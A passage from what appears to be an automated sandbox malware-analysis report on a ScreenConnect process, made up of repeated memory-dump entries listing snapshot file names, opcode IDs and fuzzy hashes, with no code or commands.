                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67A1A2706043419FE715EB78D4906DD7BF1FF46300B40CA59C486EB351EBB4BA4A8BA6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7c5c9de34ed295623cb57a2fe2e0092f1d72fb5bb2d571502be88f53723d9a46
                                                                                                                                                                                                                                                        • Instruction ID: 5acd797e812c41e62dd61729d5076c7eac41a0d4399dcd8ddae398a6088128fc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c5c9de34ed295623cb57a2fe2e0092f1d72fb5bb2d571502be88f53723d9a46
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16A11874A00209CFEB14DFA8D494A9DB7F6BF89304B508568E40AEB365DB70ED81CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b0bd9c0efe069a45428b6cf2cab22bd41641e4b3e6bf467c214cb6f3d816a44d
                                                                                                                                                                                                                                                        • Instruction ID: 82450d32d9483717b486e037f69ca1f5f20979b749cea25ce8098eaa9966b6f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0bd9c0efe069a45428b6cf2cab22bd41641e4b3e6bf467c214cb6f3d816a44d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C08163706007059FE755EF78D4906DDB7E2FF45704B80CA18C486AB740DBB0BA498BE5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b051a64ea437d7e00e8935462eff47f75a745eabea39069d255c7d0d8908e4e8
                                                                                                                                                                                                                                                        • Instruction ID: 4eab406e22378e4f6fea6f794720dc127b92ae3fdd6e009554079f87bcf18229
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b051a64ea437d7e00e8935462eff47f75a745eabea39069d255c7d0d8908e4e8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B971B275B002059FDB10EF69D484A9EBBF6FF89614B14446AD90AEB360DF30EC06CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3140f1a4a806a2fb200d2e45dc1f849bcbc3047300ee44a8d6bbabf8346eedc6
                                                                                                                                                                                                                                                        • Instruction ID: 9c9e8247310fcafee801ca0582a77938f7f963951a07a9f68e0016427e50ad03
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3140f1a4a806a2fb200d2e45dc1f849bcbc3047300ee44a8d6bbabf8346eedc6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6616131F002195BEB15EBB9C4906EE7AA6BFC9700F248529D406BB384DF34AD4687D5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6cb850461f92b6025150549850b6432b0c9e8cdc2a3fca68244d018641356d98
                                                                                                                                                                                                                                                        • Instruction ID: 295d7789061acc2d327a83e6b812b62c065cfd0ceba56be495dea6c8dbdb9f7d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cb850461f92b6025150549850b6432b0c9e8cdc2a3fca68244d018641356d98
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2611774B10209DFEB14DF69D894A6EB7B6FF8D205B108068E50AEB365DB70EC41DB80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 69348a6c4fa57b9db599b6cadb3eda892dccd466f31e38b12cc3bee648c869d4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 389aee13dfb20f6d238cbd9e95d31f4dde799a8bc7a46a5b7d77a0b1206bb21b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B41E670600701CFD774DF29D84462AB7F6BF89315B148A28E496AB7A5EB70F846CF80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b38a121d0cd0cbacc927a6fdb360e9b4deb5c00c1f24b9b987aa384ef44e5fb1
                                                                                                                                                                                                                                                        • Instruction ID: ddb01cb7c2e3460aac6a3ccdcd8877288f13faf22a19b403b8a26b684223ef89
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b38a121d0cd0cbacc927a6fdb360e9b4deb5c00c1f24b9b987aa384ef44e5fb1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47514970E503099FEB01DFA8D854BDDBBB2FF89300F108669E505AB294DB74A995CF50
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c72641d1ba8078b4b948f35951537981e564206c122ae7303f33b3bcdafc090f
                                                                                                                                                                                                                                                        • Instruction ID: 0e572990d8199871aa1dece028863c5c53b1032fefbdb8327891ce85bcf5c878
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c72641d1ba8078b4b948f35951537981e564206c122ae7303f33b3bcdafc090f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D541E530A00206CBDB15DFA8D494A6EBBB6EFC4311F04C159E80AAB349DB74ED46CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6f279f508ee3cedb46b3e1c62cec15e0eb80fedf1e5e3b40beda6d3d33065dad
                                                                                                                                                                                                                                                        • Instruction ID: 23ea18888dd6078568ee5982ca3c315c2b1891ce20767c00f249cbdb7b880272
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f279f508ee3cedb46b3e1c62cec15e0eb80fedf1e5e3b40beda6d3d33065dad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54415431E0021D9BEB15DFA9C490ADEBBB5FF85700F248129E515B7344DB70A985CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1d2f1759f45fbf3a7eafbd4dc5f87e1fea2e2b3e41f5516144f9686e1de5fed5
                                                                                                                                                                                                                                                        • Instruction ID: 0fd11835b3c32429b7a983175d6ed36680d61af10e298513b8c01fd30d837bf9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2f1759f45fbf3a7eafbd4dc5f87e1fea2e2b3e41f5516144f9686e1de5fed5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11417D34600705CFD721CF28C894A26B7F6FF8E2257148A99D48ACB7A6DB31F846DB51
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f0a3e2b7171a99da9da455e4af8859b1e473a540d151b0845dcc03ff42286522
                                                                                                                                                                                                                                                        • Instruction ID: 57750348027c111544294ad4b8476767a9ff7be4f52c2f3787657969e9e0538b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0a3e2b7171a99da9da455e4af8859b1e473a540d151b0845dcc03ff42286522
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76413C74700701CFD720CF69C88466AB7F2BF89354B548658D4969B7A5E730F94ACF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e7e83de2e47a5580e7d3bdd3f0d65d05215749645d5bcab9ac093b65aa651553
                                                                                                                                                                                                                                                        • Instruction ID: baa791c31d79ce6d1b25b391380db434eb5814d9a5de8f60fda8674f6080805f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7e83de2e47a5580e7d3bdd3f0d65d05215749645d5bcab9ac093b65aa651553
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C41BD317002059FDB14DF69D894AADBBF6BF88614F20846CE40AEB364DF70AD49CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1e3ad35ab256499165dc83a4a4b9806b7d8d14fdf3c268edc2427191ef913c8d
                                                                                                                                                                                                                                                        • Instruction ID: 651b5135e798ac3ddfbdea1152dacd0f2a0884b5d0dd37dc5c101806c2a45e75
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e3ad35ab256499165dc83a4a4b9806b7d8d14fdf3c268edc2427191ef913c8d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5541B071A013189FEB209F68D804B9EBBB5FF48310F4081E9D51CA7280DB746E89CF92
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7712bd2f16e7e1ffea43400e3f0edeba381d5bc472cfd0672b2dfa128183ba84
                                                                                                                                                                                                                                                        • Instruction ID: 5d2fce5d4a694e914030276d75a35b880fa3cf95e3c2e277b13fb718ad24d7bb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7712bd2f16e7e1ffea43400e3f0edeba381d5bc472cfd0672b2dfa128183ba84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED31E630B063449FDF15CB74D8A97AD7FB2AF8A308F14406EE402A7295DE746E0ACB51
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2462daa3858787138a96f09feac18530a957965144e1aa106e12b888d83ca27e
                                                                                                                                                                                                                                                        • Instruction ID: 843f405ecec07a3f7df0d747de0a8c8ba6faf9fc6c22ef10035ac5a8779e0c54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2462daa3858787138a96f09feac18530a957965144e1aa106e12b888d83ca27e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7313E30A00705CFD730DF2AC844A6ABBF5EF89255B148A1CD49AD77A5D770E986CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7ea1e759d430f719369752fd323539a30ae4e4fb768ed6fd83fa652e59265a64
                                                                                                                                                                                                                                                        • Instruction ID: 31579310e0c78ac91b30a65f924145ff658c57c7c15fbd1949581b3c92a41896
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ea1e759d430f719369752fd323539a30ae4e4fb768ed6fd83fa652e59265a64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8313970600B05CFD730CF69C84866AB7F6EF89321B108B5CD49A9B6A5D770E986CF80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6dfd9fc4988c7644ab6035a91a3562912b0c9bdd775dde83b27174a7a263647e
                                                                                                                                                                                                                                                        • Instruction ID: 54758585088ef8f8cc9df1eae9ebae6607eb505f98f57eef66007c2e0e07a90c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6dfd9fc4988c7644ab6035a91a3562912b0c9bdd775dde83b27174a7a263647e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76315630600705CFD730CF29C898A6AB7F5FF89225B144A2CD49ADB7A4D730E985CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ec4b40a9b963a8e9da14d96baf38bba1ba2ebfe5913d97972d1e84c6edca89d9
                                                                                                                                                                                                                                                        • Instruction ID: 6c44135b1c83f018fa3a731390bbf2b2615b6d74a7552089a38fa84e7a3054f0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec4b40a9b963a8e9da14d96baf38bba1ba2ebfe5913d97972d1e84c6edca89d9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D314270A00248CFCB01DF74DA4849EBFB6FF45324B1081AAD91ADB296CB349E02CB61
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c0e4fb4393ea56397f37e4254863b3320a2f2efc6374332d44bfd3cc962d98cc
                                                                                                                                                                                                                                                        • Instruction ID: e5bb7c6dfc909aa6cd0da0fcdb01e1dd22216d6c09222c3bcfb9c83091cb15c0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0e4fb4393ea56397f37e4254863b3320a2f2efc6374332d44bfd3cc962d98cc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23313A34600705CFD730DF6AC84865AB7F5EF89211B108A1CD49A9B7A5D730E986CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f957bff903167329a4abd04766ed4890b48e40a94ae94ecab125201d4b81da33
                                                                                                                                                                                                                                                        • Instruction ID: da30e05b202735640dbb87415aaaa01b71b2d8ae1c5426b80083b9e33a520d42
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f957bff903167329a4abd04766ed4890b48e40a94ae94ecab125201d4b81da33
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88217E30B013089FDB68DF65D4987AE7BB6EF88705F10402AE406A7384DF70AE45CB95
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c81321ae4de0278a44fcfb8715802a1f437c53a29dcbe6a5848ea7f61b4d361d
                                                                                                                                                                                                                                                        • Instruction ID: 9d49402feee4aec967b963e0d5172c08bba1f120b8ae294695c914823ce9e1fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c81321ae4de0278a44fcfb8715802a1f437c53a29dcbe6a5848ea7f61b4d361d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6921A2B4F002459FDB01DBA8E8545AE7BB1FF99300F008999D501BB361DF30AE168BA2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 693e1652e4a469a05f96d71ce5f2068d8ac9cd8d2cd32986f68be2556cb44a0c
                                                                                                                                                                                                                                                        • Instruction ID: 2e11b5df73b2f5ce33d58db93b0a1b7bc5671a2f39e9110e19e109a8cfe8c0e0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 693e1652e4a469a05f96d71ce5f2068d8ac9cd8d2cd32986f68be2556cb44a0c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9821C731B052099FDF199B65C454BAEBFB6BBC8710F18846CE406A7385FE709C41CB54
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810085782.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_18bd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7e70b0cd3e6556891a60fe9df4bc22ce2f30c86797b6417b5c78c41feb1eb37a
                                                                                                                                                                                                                                                        • Instruction ID: baae737dc9269c7b0c41ce6df998a76fe6961f76597d73510c7178a4073b5899
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e70b0cd3e6556891a60fe9df4bc22ce2f30c86797b6417b5c78c41feb1eb37a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E2145B2500204EFDB05DF44C8C0B66BF65FB88328F24C269E9098B347C336D556CAA2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d44b0830b5cff4c4146a276220be9815ca8197d7698028ba76176fedebd569e0
                                                                                                                                                                                                                                                        • Instruction ID: a30cc5c54caa629856f12ca7ca7e8e764193448a7342cb6e021b742dc6e4c5e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d44b0830b5cff4c4146a276220be9815ca8197d7698028ba76176fedebd569e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0821A471B003055BE701EB68D9907EE77A2EFD5210F508529D445EB345DB74AE068BD2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 17bd3908657065b5a39821ac8ece9ee501620919042bec3e0f5e4960863d693c
                                                                                                                                                                                                                                                        • Instruction ID: a174f861c08850c62c4685cf2249b360902d4d00b4358c9578834365083ea71c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17bd3908657065b5a39821ac8ece9ee501620919042bec3e0f5e4960863d693c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6021EA35A102198FDB14EFA8D854BDDBBF1AF89314F118469D406BB3A0DAB4AD84CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a3891548af2c556b633ef4e9513aa09626a6b33452eaf4d98f2e22fd5298bf31
                                                                                                                                                                                                                                                        • Instruction ID: 93ca02330c8b374c9ab391c0f7fa7a6493cc791d16684443447a2a45c5cf449d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3891548af2c556b633ef4e9513aa09626a6b33452eaf4d98f2e22fd5298bf31
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1121A171A003069FDB00DB68D880AEEBBB1FF85210B408929D55AEB315DB71FD45CBE1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
